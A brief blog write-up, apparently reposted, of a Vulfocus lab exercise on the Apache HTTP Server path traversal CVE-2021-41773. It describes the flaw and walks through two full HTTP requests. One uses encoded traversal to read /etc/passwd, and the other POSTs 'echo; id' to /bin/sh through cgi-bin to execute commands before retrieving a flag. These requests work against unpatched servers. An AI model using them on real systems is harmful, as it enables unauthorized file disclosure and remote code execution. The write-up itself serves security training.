当前位置:网站首页>vulfocus - apache (cve_2021_41773)

vulfocus - apache (cve_2021_41773)

2022-09-23 08:38:38stealth rookie

Description

A path traversal vulnerability exists in the changes made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50, which could allow attackers to read other files outside the Web directory, such as system configuration files, websiteSource code, etc., and even under certain circumstances, an attacker can construct malicious requests to execute commands and control the server.

Path traversal attacks can be used by attackers to map URLs to files outside the expected document root, if files outside the document root are not protected by the "requireall denied" access control parameter (disabled by default), these maliciousThe request will succeed.In addition to this, the vulnerability could lead to leaking the source of interpreted files such as CGI scripts.

Repeat

1. Open the shooting range

2. File read, use burp to capture packets and send a request

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404;

3.rce command execution

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host:123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9;=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1
Content-Length: 8

echo; id

4. The above execution is successful, ls /tmp finds the flag

原网站

版权声明
本文为[stealth rookie]所创,转载请带上原文链接,感谢
https://chowdera.com/2022/266/202209230828454520.html

随机推荐